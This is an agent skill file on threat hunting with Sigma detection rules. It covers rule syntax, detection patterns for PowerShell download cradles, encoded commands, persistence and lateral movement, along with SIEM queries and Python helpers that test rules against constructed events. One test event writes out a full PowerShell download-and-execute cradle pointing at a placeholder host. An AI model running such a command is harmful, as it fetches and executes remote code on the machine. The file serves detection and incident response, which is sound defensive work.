AgentSkillsCN

threat-hunting

Use Sigma detection rules and security analysis techniques to hunt for and respond to threats efficiently. Suitable for security incident investigation, detection rule development, or analysis of suspicious activity.

SKILL.md

---
name: threat-hunting
description: Hunt threats using Sigma detection rules and security analysis techniques. Use when investigating security incidents, creating detection rules, or analyzing suspicious activity.
---

Threat Hunting with Sigma Rules

When to Use This Skill

  • Investigating security incidents
  • Creating detection rules for SIEM
  • Analyzing suspicious activity patterns
  • Building threat detection pipelines
  • Converting detections between platforms

Sigma Rule Basics

Rule Structure

yaml
title: Suspicious PowerShell Download
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
status: experimental
description: Detects PowerShell commands downloading files from the internet
author: Security Team
date: 2024/01/15
modified: 2024/01/20

logsource:
  category: process_creation
  product: windows

detection:
  selection_process:
    Image|endswith: '\powershell.exe'
  selection_commands:
    CommandLine|contains|all:
      - 'Net.WebClient'
      - 'DownloadString'
  condition: selection_process and selection_commands

falsepositives:
  - Legitimate administrative scripts
  - Software installers

level: medium

tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1140

Field Modifiers

Modifier     Description              Example
contains     Substring match          CommandLine|contains: 'wget'
startswith   Prefix match             Image|startswith: 'C:\Temp'
endswith     Suffix match             Image|endswith: '.exe'
re           Regex match              CommandLine|re: '.*base64.*'
all          All values must match    |contains|all:
base64       Base64 decode first      CommandLine|base64|contains:
cidr         IP range match           DestinationIp|cidr: '10.0.0.0/8'

Common Detection Patterns

Process Creation

yaml
title: Suspicious Process from Temp Directory
logsource:
  category: process_creation
  product: windows

detection:
  selection:
    Image|contains:
      - '\Temp\'
      - '\AppData\Local\Temp\'
    Image|endswith:
      - '.exe'
      - '.com'
      - '.scr'
  filter_known:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
  condition: selection and not filter_known

Network Connections

yaml
title: Outbound Connection to Known Malicious Port
logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Initiated: 'true'
    DestinationPort:
      - 4444  # Metasploit
      - 5555  # Common RAT
      - 6666  # IRC
      - 8080  # Web proxy
  condition: selection

File Creation

yaml
title: Executable Created in Suspicious Location
logsource:
  category: file_event
  product: windows

detection:
  selection:
    EventType: 'creation'
    TargetFilename|endswith:
      - '.exe'
      - '.dll'
      - '.ps1'
    TargetFilename|contains:
      - '\Windows\Temp\'
      - '\ProgramData\'
      - '\Users\Public\'
  condition: selection

Registry Modifications

yaml
title: Run Key Persistence
logsource:
  category: registry_event
  product: windows

detection:
  selection:
    EventType: SetValue
    TargetObject|contains:
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
  condition: selection

Hunting Queries

PowerShell Hunting

yaml
# Encoded PowerShell Commands
title: Encoded PowerShell Execution
logsource:            # required by the Sigma spec; without it the rule fails validation
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - '-e '
    CommandLine|base64offset|contains:
      - 'IEX'
      - 'Invoke-Expression'
  condition: selection
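The modifier table above and the `base64offset` hunt just shown can be exercised without a SIEM. The following is an added example, not pySigma and not part of the skill: a small in-memory evaluator for the modifiers this page uses (`contains`, `startswith`, `endswith`, `all`, `cidr`, `base64offset`), run against constructed process events. It adds the `wide` modifier to the encoded-PowerShell selection because `-EncodedCommand` payloads are Base64 over UTF-16LE text; the event contents and the `hunt` helper are assumptions.

```python
import base64, ipaddress
# Added example (not pySigma): a minimal in-memory evaluator for the Sigma field
# modifiers used on this page, run against constructed process_creation events.
def base64_offsets(val: bytes) -> list:
    # Sigma 'base64offset': the three encodings a substring can take inside a
    # larger Base64 blob, depending on its byte alignment (offset 0, 1 or 2).
    starts, ends = (0, 2, 3), (None, -3, -2)
    return [base64.b64encode(b" " * i + val)[starts[i]:ends[(len(val) + i) % 3]].decode()
            for i in range(3)]

def match_value(mods: set, actual, expected) -> bool:
    if "cidr" in mods:  # as in the exfiltration rule's filter_internal selection
        return ipaddress.ip_address(actual) in ipaddress.ip_network(expected)
    if "base64offset" in mods:  # 'wide' = UTF-16LE before encoding (PowerShell -enc)
        raw = expected.encode("utf-16-le" if "wide" in mods else "utf-8")
        variants, a = base64_offsets(raw), str(actual)  # Base64 is case-sensitive
    else:  # plain Sigma string matching is case-insensitive
        variants, a = [str(expected).lower()], str(actual).lower()
    for v in variants:
        if "contains" in mods and v in a: return True
        if "startswith" in mods and a.startswith(v): return True
        if "endswith" in mods and a.endswith(v): return True
        if not mods & {"contains", "startswith", "endswith"} and a == v: return True
    return False

def match_selection(selection: dict, event: dict) -> bool:
    # Every 'Field|mod|mod' key must match; a value list is OR unless 'all' is set.
    for key, expected in selection.items():
        field, *mods = key.split("|")
        values = expected if isinstance(expected, list) else [expected]
        hits = [field in event and match_value(set(mods), event[field], v) for v in values]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

# The page's 'Encoded PowerShell Execution' selection, with 'wide' added because
# -EncodedCommand payloads are Base64 over UTF-16LE text.
ENCODED_PS = {"CommandLine|contains": ["-enc", "-EncodedCommand", "-e "],
              "CommandLine|wide|base64offset|contains": ["IEX", "Invoke-Expression"]}

def encoded_cmd(script: str) -> str:  # how PowerShell builds an -enc argument
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed events: one download cradle from the rule above, one benign admin command.
EVENTS = [{"CommandLine": "powershell.exe -nop -w hidden -enc " + encoded_cmd(
               "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")},
          {"CommandLine": "powershell.exe -EncodedCommand " + encoded_cmd("Get-Process | Sort-Object CPU")}]

def hunt(selection: dict, events: list) -> list:
    return [i for i, e in enumerate(events) if match_selection(selection, e)]  # -> [0]
```

Note that the benign event passes the first key (`-EncodedCommand` contains `-enc`) and is only rejected by the `base64offset` key, which is why the two selections are combined.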

Lateral Movement

yaml
# PsExec-like Activity
title: Remote Service Installation
logsource:
  product: windows
  service: system

detection:
  selection:
    EventID: 7045  # Service installed
    ServiceFileName|contains:
      - '\ADMIN$\'
      - '\C$\'
  condition: selection

Data Exfiltration

yaml
# Large Outbound Transfers
title: Large Data Transfer to External IP
logsource:
  category: proxy

detection:
  selection:
    bytes_out|gt: 10000000  # 10MB
  filter_internal:
    dst_ip|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_internal

MITRE ATT&CK Mapping

yaml
tags:
  # Initial Access
  - attack.initial_access
  - attack.t1566        # Phishing

  # Execution
  - attack.execution
  - attack.t1059.001    # PowerShell
  - attack.t1059.003    # Windows Command Shell

  # Persistence
  - attack.persistence
  - attack.t1547.001    # Registry Run Keys

  # Defense Evasion
  - attack.defense_evasion
  - attack.t1140        # Deobfuscate/Decode

  # Credential Access
  - attack.credential_access
  - attack.t1003        # OS Credential Dumping

  # Lateral Movement
  - attack.lateral_movement
  - attack.t1021.002    # SMB/Windows Admin Shares

Converting Sigma Rules

To Splunk

bash
# Using sigmac (legacy)
sigmac -t splunk -c sysmon rule.yml

# Using sigma-cli
sigma convert -t splunk -p sysmon rule.yml

To Elastic

bash
sigma convert -t elasticsearch -p ecs_windows rule.yml   # pipeline name uses an underscore

To Microsoft Sentinel

bash
sigma convert -t microsoft365defender rule.yml

Investigation Workflow

1. Triage Alert

markdown
## Alert Triage Checklist

- [ ] Verify the detection fired correctly
- [ ] Check for false positive indicators
- [ ] Identify affected systems
- [ ] Determine timeline of activity
- [ ] Assess potential impact

2. Gather Context

splunk
# Related process activity
index=windows EventCode=1
| where host="affected_host"
| where _time >= relative_time(now(), "-1h")
| stats count by Image, CommandLine, ParentImage
| sort -count

# Network connections from host
index=network src_ip="10.1.1.50"
| where _time >= relative_time(now(), "-1h")
| stats count by dest_ip, dest_port
| sort -count

3. Timeline Analysis

markdown
| Time | Event | Source | Details |
|------|-------|--------|---------|
| 10:00 | Phishing email | Email logs | malicious.doc attached |
| 10:05 | Document opened | Process logs | WINWORD.EXE spawned |
| 10:06 | PowerShell | Process logs | Encoded command |
| 10:07 | Network conn | Firewall | C2 callback to 1.2.3.4 |
| 10:10 | New service | Event logs | Persistence installed |

4. Containment

bash
# Isolate affected system
# Block IOCs at firewall
# Disable compromised accounts
# Preserve evidence
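As an added example (not part of the skill), the context gathered in step 2 can be correlated programmatically into the step 3 timeline: constructed process, network and service records for one host are joined by pid where the source carries one, and by time window where it does not (EventID 7045 has no pid). Field names, pids and times are assumptions.

```python
# Added example, not part of the skill: correlate constructed events from several
# log sources around one alert into the kind of timeline built in step 3.
# Constructed records (HH:MM, one host, one day); field names loosely follow Sysmon.
PROCESS = [  # EventCode 1: process creation
    {"t": "09:30", "pid": 3000, "ppid": 900, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"t": "10:05", "pid": 4100, "ppid": 3000, "Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" malicious.doc'},
    {"t": "10:06", "pid": 4212, "ppid": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -enc <encoded command omitted>"},
    {"t": "10:08", "pid": 4300, "ppid": 3000, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]
NETWORK = [  # EventCode 3: network connection, joined to processes by pid
    {"t": "10:07", "pid": 4212, "dest_ip": "1.2.3.4", "dest_port": 443},
    {"t": "10:09", "pid": 4300, "dest_ip": "10.1.1.20", "dest_port": 445},
]
SERVICES = [  # System log EventID 7045; carries no pid, so it is correlated by time
    {"t": "10:10", "ServiceName": "UpdaterSvc", "ServiceFileName": r"C:\Users\Public\svc.exe"},
    {"t": "11:30", "ServiceName": "PrintSvc", "ServiceFileName": r"C:\Windows\System32\spool.exe"},
]

def minutes(hhmm: str) -> int:
    h, m = hhmm.split(":")
    return int(h) * 60 + int(m)

def ancestry(pid: int, procs: list) -> list:
    # Walk ppid links upward from the alerting process until the parent is unknown.
    by_pid = {p["pid"]: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def timeline(alert_pid: int, procs: list, net: list, services: list, window: int = 10) -> list:
    # Rows are (time, source, event, details), like the table in step 3.
    tree = ancestry(alert_pid, procs)
    pids = {p["pid"] for p in tree}
    t0 = minutes(tree[0]["t"])  # time of the alerting process
    rows = [(p["t"], "Process logs", p["Image"].rsplit("\\", 1)[-1] + " spawned", p["CommandLine"])
            for p in tree]
    rows += [(n["t"], "Firewall", "Network conn", "%s:%d from pid %d" % (n["dest_ip"], n["dest_port"], n["pid"]))
             for n in net if n["pid"] in pids]
    # Services lack a pid: keep only installs within `window` minutes after the alert.
    rows += [(s["t"], "Event logs", "New service " + s["ServiceName"], s["ServiceFileName"])
             for s in services if t0 <= minutes(s["t"]) <= t0 + window]
    return sorted(rows)
```

Calling `timeline(4212, PROCESS, NETWORK, SERVICES)` yields the WINWORD.EXE to powershell.exe to C2 callback to new-service sequence while dropping the unrelated notepad.exe connection and the later service install.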

Rule Testing

python
# Test Sigma rule with pySigma
from sigma.rule import SigmaRule
from sigma.backends.splunk import SplunkBackend

rule = SigmaRule.from_yaml("""
title: Test Rule
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\\cmd.exe'
  condition: selection
""")

backend = SplunkBackend()
# convert_rule returns a list of query strings (one per rule) for the target backend
for query in backend.convert_rule(rule):
    print(query)

Best Practices

  • Test rules against known-good baseline
  • Include false positive documentation
  • Map to MITRE ATT&CK techniques
  • Version control all rules
  • Regular rule review and tuning
  • Document investigation runbooks
  • Share rules with community (when appropriate)